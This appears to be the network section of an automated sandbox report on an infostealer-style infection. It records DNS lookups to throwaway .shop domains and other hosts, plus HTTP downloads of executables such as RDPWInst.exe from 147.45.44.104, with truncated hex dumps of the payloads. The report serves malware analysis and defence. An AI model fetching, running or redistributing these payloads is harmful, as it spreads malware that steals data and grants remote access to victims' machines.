                                                                                    Sep 27, 2024 00:15:13.448158979 CEST192.168.2.41.1.1.10xc483Standard query (0)fragnantbui.shopA (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:14.396934032 CEST192.168.2.41.1.1.10x3f94Standard query (0)stogeneratmns.shopA (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:14.516217947 CEST192.168.2.41.1.1.10x80cdStandard query (0)cowod.hopto.orgA (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:16.207473993 CEST192.168.2.41.1.1.10x7ed1Standard query (0)reinforcenh.shopA (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:18.172069073 CEST192.168.2.41.1.1.10x13e1Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:19.553369999 CEST192.168.2.41.1.1.10xb8b0Standard query (0)ballotnwu.siteA (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:30.626862049 CEST192.168.2.41.1.1.10x225cStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:35.007052898 CEST192.168.2.41.1.1.10xab06Standard query (0)hansgborn.euA (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:39.390388966 CEST192.168.2.41.1.1.10xce8fStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Sep 27, 2024 00:14:26.439091921 CEST1.1.1.1192.168.2.40xfedeNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:07.184736967 CEST1.1.1.1192.168.2.40xa62eNo error (0)wallkedsleeoi.shop104.21.36.139A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:07.184736967 CEST1.1.1.1192.168.2.40xa62eNo error (0)wallkedsleeoi.shop172.67.194.216A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:08.177232981 CEST1.1.1.1192.168.2.40x5b13No error (0)gutterydhowi.shop104.21.4.136A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:08.177232981 CEST1.1.1.1192.168.2.40x5b13No error (0)gutterydhowi.shop172.67.132.32A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:09.114937067 CEST1.1.1.1192.168.2.40x9409No error (0)ghostreedmnu.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:09.114937067 CEST1.1.1.1192.168.2.40x9409No error (0)ghostreedmnu.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:10.052309036 CEST1.1.1.1192.168.2.40x1e8cNo error (0)offensivedzvju.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:10.052309036 CEST1.1.1.1192.168.2.40x1e8cNo error (0)offensivedzvju.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:11.300513983 CEST1.1.1.1192.168.2.40xb0eeNo error (0)vozmeatillu.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:11.300513983 CEST1.1.1.1192.168.2.40xb0eeNo error (0)vozmeatillu.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:12.510329008 CEST1.1.1.1192.168.2.40x731cNo error (0)drawzhotdog.shop172.67.162.108A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:12.510329008 CEST1.1.1.1192.168.2.40x731cNo error (0)drawzhotdog.shop104.21.58.182A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:13.461260080 CEST1.1.1.1192.168.2.40xc483No error (0)fragnantbui.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:13.461260080 CEST1.1.1.1192.168.2.40xc483No error (0)fragnantbui.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:14.413163900 CEST1.1.1.1192.168.2.40x3f94No error (0)stogeneratmns.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:14.413163900 CEST1.1.1.1192.168.2.40x3f94No error (0)stogeneratmns.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:14.526509047 CEST1.1.1.1192.168.2.40x80cdNo error (0)cowod.hopto.org45.132.206.251A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:16.222239017 CEST1.1.1.1192.168.2.40x7ed1No error (0)reinforcenh.shop172.67.208.139A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:16.222239017 CEST1.1.1.1192.168.2.40x7ed1No error (0)reinforcenh.shop104.21.77.130A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:18.178950071 CEST1.1.1.1192.168.2.40x13e1No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:19.574954033 CEST1.1.1.1192.168.2.40xb8b0No error (0)ballotnwu.site172.67.128.144A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:19.574954033 CEST1.1.1.1192.168.2.40xb8b0No error (0)ballotnwu.site104.21.2.13A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:30.635106087 CEST1.1.1.1192.168.2.40x225cNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:30.635106087 CEST1.1.1.1192.168.2.40x225cNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:30.635106087 CEST1.1.1.1192.168.2.40x225cNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:35.025650978 CEST1.1.1.1192.168.2.40xab06No error (0)hansgborn.eu188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:35.025650978 CEST1.1.1.1192.168.2.40xab06No error (0)hansgborn.eu188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:39.399322033 CEST1.1.1.1192.168.2.40xce8fNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                    • steamcommunity.com
                                                                                    • 5.75.211.162
                                                                                    • wallkedsleeoi.shop
                                                                                    • gutterydhowi.shop
                                                                                    • ghostreedmnu.shop
                                                                                    • offensivedzvju.shop
                                                                                    • vozmeatillu.shop
                                                                                    • drawzhotdog.shop
                                                                                    • fragnantbui.shop
                                                                                    • stogeneratmns.shop
                                                                                    • reinforcenh.shop
                                                                                    • ballotnwu.site
                                                                                    • hansgborn.eu
                                                                                    • 147.45.44.104
                                                                                    • cowod.hopto.org
                                                                                    • api.ipify.org
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449764147.45.44.10480396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Sep 27, 2024 00:15:05.621565104 CEST195OUTGET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 147.45.44.104
                                                                                    Cache-Control: no-cache
                                                                                    Sep 27, 2024 00:15:06.278753996 CEST1236INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:06 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 385064
                                                                                    Last-Modified: Thu, 26 Sep 2024 22:09:48 GMT
                                                                                    Connection: keep-alive
                                                                                    Keep-Alive: timeout=120
                                                                                    ETag: "66f5dbac-5e028"
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Accept-Ranges: bytes
                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 db f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b0 05 00 00 08 00 00 00 00 00 00 3e ce 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 cd 05 00 53 00 00 00 00 e0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 ba 05 00 28 26 00 00 00 00 06 00 0c 00 00 00 b0 cc 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$f> @ `S(& H.textD `.rsrc@@.reloc@B H0yYYlv^5fH$/Wazz5O7fSl\RBk5EqvBf9v;(F J*gi(BBMs<ub l]Qg\Bc*$fVGZ.8lH;!"pUO8Y"d\dD"sm}c#?4?Y#0VSX|G.g:!rM[~eBpbz{`5||bOGAh}s
                                                                                    Sep 27, 2024 00:15:06.278795958 CEST1236INData Raw: 38 a0 ec cc 57 dc 50 61 47 3f b0 95 f7 55 f7 4b 25 ea 39 5d ff 7c 81 f9 ae 87 b6 77 63 5c 7c 9c e0 42 9a aa 4b 3d 9f 44 8d 15 75 0a 10 47 a3 40 b9 1d 71 fd 17 d3 79 30 67 e6 d1 e5 35 d8 ac 09 69 9a 8c a7 f3 13 a1 04 3c 06 74 5a e9 d0 02 51 13 87
                                                                                    Data Ascii: 8WPaG?UK%9]|wc\|BK=DuG@qy0g5i<tZQBg*M-jX=dI+:&zIj7eG@p)l{ >@~yM%H};7$lWdTtymhQQ;?(sx_/u9bO[
                                                                                    Sep 27, 2024 00:15:06.278829098 CEST448INData Raw: 78 31 03 30 a5 b4 37 4e b6 91 c7 59 cd cb 89 0b d3 c8 22 34 53 ee 3d 10 65 5d a4 39 04 a2 eb a1 0d 84 e2 79 8e 91 fb 9b 6b 3b b2 ea ca bf de 4e 93 dc d2 e7 1e 7f 0d 78 ab 1f 73 d6 8c 4a 80 66 ab f9 eb 72 71 5f 9b 59 89 38 9d 05 82 fc 42 bb 27 e4
                                                                                    Data Ascii: x107NY"4S=e]9yk;NxsJfrq_Y8B'LUa>bnD8QvG30EAa\qk/. l4J1B2 e?BOcAy;!,ymT9D?]GjFxkh*s:t]
                                                                                    Sep 27, 2024 00:15:06.278861046 CEST1236INData Raw: 70 4c 26 45 79 c9 d0 59 88 33 ca 65 e4 86 a5 24 7b 3e c1 7d b2 cf 94 62 cc e5 3c 37 01 0f dc 4f 52 04 72 11 d0 57 75 12 53 5b 08 76 b4 90 a7 58 f1 0d 76 fb 40 f4 33 51 fc a9 bd 42 28 67 05 c0 b9 ad 75 30 5c 77 c0 2f af c6 69 1e c1 85 e4 5b 16 5c
                                                                                    Data Ascii: pL&EyY3e${>}b<7ORrWuS[vXv@3QB(gu0\w/i[\Wu2R/RuQ^\ZwP;;^>)m7xz$PT+s%*K_!%#VN?Pt)^W-L Xj^~Q!aq
                                                                                    Sep 27, 2024 00:15:06.278894901 CEST1236INData Raw: a5 a1 85 35 aa ac 8b b6 cd 97 f9 54 72 da e4 f5 6f 87 cb 52 77 b4 b1 ef 3b 0e 69 d6 30 42 53 b9 7f a6 b1 61 2c ea 2d 12 99 ae 28 74 7b e8 6f 01 d2 bc f2 55 ca fc 6c 73 ab 39 11 cb 5f cc 5d 86 9a 62 bc 56 d5 5e cb 1a cf 6a 73 73 03 9c 06 05 32 9b
                                                                                    Data Ascii: 5TroRw;i0BSa,-(t{oUls9_]bV^jss2W5!YXdW`DA)ETp"Dv/8M9`(yX"msFl,'`8eW2-[ssqS[o[njSoXk[ISzWC7r R$
                                                                                    Sep 27, 2024 00:15:06.278928041 CEST1236INData Raw: bc 8c 26 77 e3 4f 9b 7a 6a e2 f3 9c 97 e3 7e 96 41 e7 df dd 7e 85 8e 0b fe 1f c5 e1 8c bd 08 44 76 bc c8 c6 80 a8 cf 46 f3 17 fd 9c 7b 74 83 c9 62 c5 3b fc 17 e9 be 08 d0 1f b5 de e0 75 8c 71 49 11 c5 f4 16 b4 41 dd 88 20 17 6b 46 06 2e ec 21 d2
                                                                                    Data Ascii: &wOzj~A~DvF{tb;uqIA kF.!-K%(:;;O5Z&s(0LzPrH6{RzZ!;rFG 4>YuIcxb$%k(|DjkTjE@WjxiLld}u[hk
                                                                                    Sep 27, 2024 00:15:06.278961897 CEST1236INData Raw: b2 a2 09 e4 0c e1 17 6d d5 ce e7 90 54 7d 1f 12 a0 cd 9d da 66 b4 16 8c 9e 55 50 98 bf 87 64 43 88 86 75 68 51 14 f6 3e fe 91 dc dd 48 42 ef 0a 00 d4 9e 7d e0 9d 46 97 9d 8a c3 e8 4a a6 c3 17 c1 08 dc 06 5c 85 b2 bd 2d 56 a9 13 2b fd a0 c4 89 3e
                                                                                    Data Ascii: mT}fUPdCuhQ>HB}FJ\-V+>sqHFIN$+<C][LT;_C1!OvGS[v?66tFn4Rw~&h*s5X_%id*\AUx(h3GY/$eEn'XjlN
                                                                                    Sep 27, 2024 00:15:06.278994083 CEST328INData Raw: cb f5 f8 ce 98 cd 4d 25 b5 b2 fc e0 7e ee 83 ca f6 ec b2 f1 16 57 8a bf 1f a1 a3 f7 fc 23 cb 23 86 bf f3 04 48 50 d0 a6 9f cc 82 ab 50 b9 ab 23 36 68 74 4a 3e 99 e9 b9 50 07 5e 08 3e aa fa ac 0a 4d 08 78 46 bc f2 17 81 b2 eb 2e 27 38 40 ca 5a e5
                                                                                    Data Ascii: M%~W##HPP#6htJ>P^>MxF.'8@ZEW'Ju3rS`b5KiYR-2~iACL5h-7JE.)?mJXxe8[e22/3@l`n||}R&]D6(:),3i:K
                                                                                    Sep 27, 2024 00:15:06.279027939 CEST1236INData Raw: a2 a2 20 c4 dd 31 7b 0d 5d a6 48 4d 07 49 45 d3 4e 22 6e 2d 82 f7 ec 90 69 d4 4a 6a 2f b4 ba b5 14 2f dc 86 1f a2 1a 13 a4 82 c0 7a 3c fe ac 94 88 9d b2 94 e2 0c 62 4a 32 32 93 ad 37 a1 c2 0a fe 6f 1c 29 9e a6 3c bb e9 09 de 30 9d 64 cd 57 e8 ed
                                                                                    Data Ascii: 1{]HMIEN"n-iJj//z<bJ227o)<0dW ;7jqz1zuGQ9vTE)NFNUiZ{{M!xzU!Y/3+,?1{=jh70D%3="PQ5~%HqBBltK&(
                                                                                    Sep 27, 2024 00:15:06.279057980 CEST224INData Raw: 56 79 e7 2f d1 ec ec 30 66 b9 4c a0 81 ce 3b 60 db 1d cc 6a 5a 93 c9 1b 2a 85 5c da 55 d2 39 e0 d8 4b 9b eb f8 27 a4 1d 36 da 61 ba 44 9f 14 7f a2 2d 60 88 89 05 5d a9 1a f1 cc f0 f3 b0 34 cd 93 64 4c f2 ad e0 bf e8 6e 2d e3 e8 f3 9b 5d 9b 1c a5
                                                                                    Data Ascii: Vy/0fL;`jZ*\U9K'6aD-`]4dLn-]Hc7W5eXz=:0{wa:28W@?RL(&jt;b2L5nx pp}<9B,t6j0Zvi5@KsLP
                                                                                    Sep 27, 2024 00:15:06.286652088 CEST1236INData Raw: f0 14 b5 2a 0d 4e 8c 0d 55 37 d1 95 35 9a d7 5d fe 64 d2 5c 53 c6 2c 81 41 f1 69 e7 ac ac 20 6a 73 af 7d 89 95 c1 6e 52 b9 4c f8 25 47 51 81 28 38 51 79 29 45 cd 62 fb 6b 7b 20 e9 97 0f 26 25 44 c5 6f cc b4 7b 65 59 56 a3 62 44 78 47 63 c7 45 ea
                                                                                    Data Ascii: *NU75]d\S,Ai js}nRL%GQ(8Qy)Ebk{ &%Do{eYVbDxGcET5rTrCHLu0aiv.SbX!5y/;CBb7@v~n(uR+)VeL7SSF]R0>sPa=;7*,mm:Xa
                                                                                    Sep 27, 2024 00:15:08.712829113 CEST192OUTGET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 147.45.44.104
                                                                                    Cache-Control: no-cache
                                                                                    Sep 27, 2024 00:15:08.898118019 CEST1236INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:08 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 413224
                                                                                    Last-Modified: Thu, 26 Sep 2024 22:09:34 GMT
                                                                                    Connection: keep-alive
                                                                                    Keep-Alive: timeout=120
                                                                                    ETag: "66f5db9e-64e28"
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Accept-Ranges: bytes
                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed da f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1e 06 00 00 08 00 00 00 00 00 00 3e 3c 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 3b 06 00 53 00 00 00 00 40 06 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 28 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 b0 3a 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf>< @@ `;S@((&`: H.textD `.rsrc@ @@.reloc`&@B <H*0^8=.Qv A3[RJ*_f9\lvC#SsnB~E~i7}+V#8f#XWb(<O1$=UN8)LL(K,r%9LY=0T4&d.(U'="(>d+92p81Pa\q]X/a@0CPQBv6le24I3PC:v}QwpS(AQg'N_XmvgJ/J6^D^MIO45+e^
                                                                                    Sep 27, 2024 00:15:10.898087025 CEST188OUTGET /prog/66f5d9ab0d4c7_rdp.exe HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 147.45.44.104
                                                                                    Cache-Control: no-cache
                                                                                    Sep 27, 2024 00:15:11.279222965 CEST1236INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:10 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 73216
                                                                                    Last-Modified: Thu, 26 Sep 2024 22:01:15 GMT
                                                                                    Connection: keep-alive
                                                                                    Keep-Alive: timeout=120
                                                                                    ETag: "66f5d9ab-11e00"
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Accept-Ranges: bytes
                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 0f 16 c8 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 04 01 00 00 18 00 00 00 00 00 00 0e 22 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 21 01 00 53 00 00 00 00 40 01 00 17 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0" @@ `!S@` H.text `.rsrc@@@.reloc`@B!HtD%,("*(*6|(0*Vs1rp((2*Js1s3(4*Zrp((oE*(N:*rp(r&p((O(*rp((rp(oE:rp(*rp(*rMp({rMp((RoS(T*b:rp(*oU*0n(s(rpo(sooo


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.449774147.45.44.104803396C:\ProgramData\AFHDGDGIID.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Sep 27, 2024 00:15:12.815418005 CEST94OUTGET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1
                                                                                    Host: 147.45.44.104
                                                                                    Connection: Keep-Alive
                                                                                    Sep 27, 2024 00:15:13.434382915 CEST1236INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:15:13 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 1785344
                                                                                    Last-Modified: Thu, 26 Sep 2024 12:36:03 GMT
                                                                                    Connection: keep-alive
                                                                                    Keep-Alive: timeout=120
                                                                                    ETag: "66f55533-1b3e00"
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Accept-Ranges: bytes
                                                                                    Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 [TRUNCATED]
                                                                                    Data Ascii: MZP@!L!This program must be run under Win32$7PEL#CZ4<7P@@`{^.text `.itext|0 `.dataxP8@.bssOpL.idataL@.tls`.rdata`@@.reloc^`b@B.rsrc{`|@@p@@
                                                                                    Sep 27, 2024 00:15:13.434405088 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: @Boolean@FalseTrueSystem4@AnsiChar@P@Char@h@ShortInt@@SmallInt
                                                                                    Sep 27, 2024 00:15:13.434416056 CEST1236INData Raw: 15 40 00 42 00 f4 ff b2 15 40 00 43 00 f4 ff f0 15 40 00 42 00 f4 ff 1f 16 40 00 42 00 f4 ff 48 16 40 00 43 00 f4 ff 7c 16 40 00 43 00 f4 ff b5 16 40 00 43 00 f4 ff e0 16 40 00 43 00 f4 ff 09 17 40 00 43 00 f4 ff 35 17 40 00 43 00 f4 ff 71 17 40
                                                                                    Data Ascii: @B@C@B@BH@C|@C@C@C@C5@Cq@C@C@C-@Bg@B@B@C%@CV@C@J@J@J@Ju@J@J@J@JO@Kz@J@MTOb
                                                                                    Sep 27, 2024 00:15:13.434473991 CEST1236INData Raw: 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 33 00 70 53 40 00 08 55 6e 69 74 4e 61 6d 65 03 00 10 12 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 10 12 40 00 01 00 01 01 02 00 02 00 33 00 48 52 40 00 06 45 71 75 61 6c 73 03
                                                                                    Data Ascii: Self3pS@UnitName@Self@@3HR@Equals@@Self@Obj+PR@GetHashCode@@Self38T@ToString@@Self@@[0T@SafeCallExceptionl@
                                                                                    Sep 27, 2024 00:15:13.434485912 CEST896INData Raw: 09 54 44 61 74 65 54 69 6d 65 01 02 00 8b c0 2c 1e 40 00 0e 0e 54 56 61 72 41 72 72 61 79 42 6f 75 6e 64 08 00 00 00 00 00 00 00 00 02 00 00 00 9c 10 40 00 00 00 00 00 02 0c 45 6c 65 6d 65 6e 74 43 6f 75 6e 74 02 00 9c 10 40 00 04 00 00 00 02 08
                                                                                    Data Ascii: TDateTime,@TVarArrayBound@ElementCount@LowBound|@TVarArrayBoundArray(@@PVarArray@@@TVarArray@DimCount@Flags@Eleme
                                                                                    Sep 27, 2024 00:15:13.434495926 CEST1236INData Raw: 00 00 00 00 00 02 07 52 61 77 44 61 74 61 02 00 02 00 90 b0 21 40 00 0d 0a 54 54 79 70 65 54 61 62 6c 65 fc ff ff 7f ff ff ff 1f e4 10 40 00 01 00 00 00 00 02 00 90 d4 21 40 00 14 0a 50 54 79 70 65 54 61 62 6c 65 ac 21 40 00 02 00 8b c0 ec 21 40
                                                                                    Data Ascii: RawData!@TTypeTable@!@PTypeTable!@!@PPackageTypeInfo"@"@TPackageTypeInfo@TypeCount!@TypeTable@UnitCount@UnitNames@"@PLibMo
                                                                                    Sep 27, 2024 00:15:13.434506893 CEST1236INData Raw: 68 65 20 73 69 7a 65 73 20 6f 66 20 75 6e 65 78 70 65 63 74 65 64 20 6c 65 61 6b 65 64 20 6d 65 64 69 75 6d 20 61 6e 64 20 6c 61 72 67 65 20 62 6c 6f 63 6b 73 20 61 72 65 3a 20 00 00 00 00 20 62 79 74 65 73 3a 20 00 00 00 00 55 6e 6b 6e 6f 77 6e
                                                                                    Data Ascii: he sizes of unexpected leaked medium and large blocks are: bytes: UnknownAnsiStringUnicodeStringUnexpected Memory Leak@H@JB@HJHJH@JB@HJHJHJHJH@JB@
                                                                                    Sep 27, 2024 00:15:13.434519053 CEST1236INData Raw: 24 04 89 50 04 c6 05 c4 9a 44 00 00 8b c7 83 c4 24 5d 5f 5e 5b c3 90 53 56 57 55 83 c4 e0 8b f2 8b f8 8b c7 83 e8 04 8b 00 8b d8 83 e3 f0 83 eb 14 3b de 0f 83 e1 00 00 00 8b d3 c1 ea 02 03 d3 3b d6 76 04 8b ea eb 02 8b ee 8b d7 83 ea 10 83 e0 f0
                                                                                    Data Ascii: $PD$]_^[SVWU;;v$jD$PD$P{|$upd$+D$;s\+J;sjh SD$Pt-jhSD$PtpZZwztj,
                                                                                    Sep 27, 2024 00:15:13.434537888 CEST1236INData Raw: 00 89 f0 5f 5e 5b c3 5b 85 c0 0f 89 2b fa ff ff 31 c0 c3 8b 50 fc f6 c2 07 89 c1 53 8a 1d 4d 70 44 00 0f 85 e3 00 00 00 84 db 8b 1a 75 61 83 6a 0c 01 8b 42 08 74 2c 85 c0 89 4a 08 8d 40 01 89 41 fc 74 07 31 c0 88 03 5b c3 90 8b 4b 04 89 5a 14 89
                                                                                    Data Ascii: _^[[+1PSMpDuajBt,J@At1[KZJQS1[tBJHA19SuCRMpD#t=xDuQRjZY#oQRjZY%4zDtB=xDuj
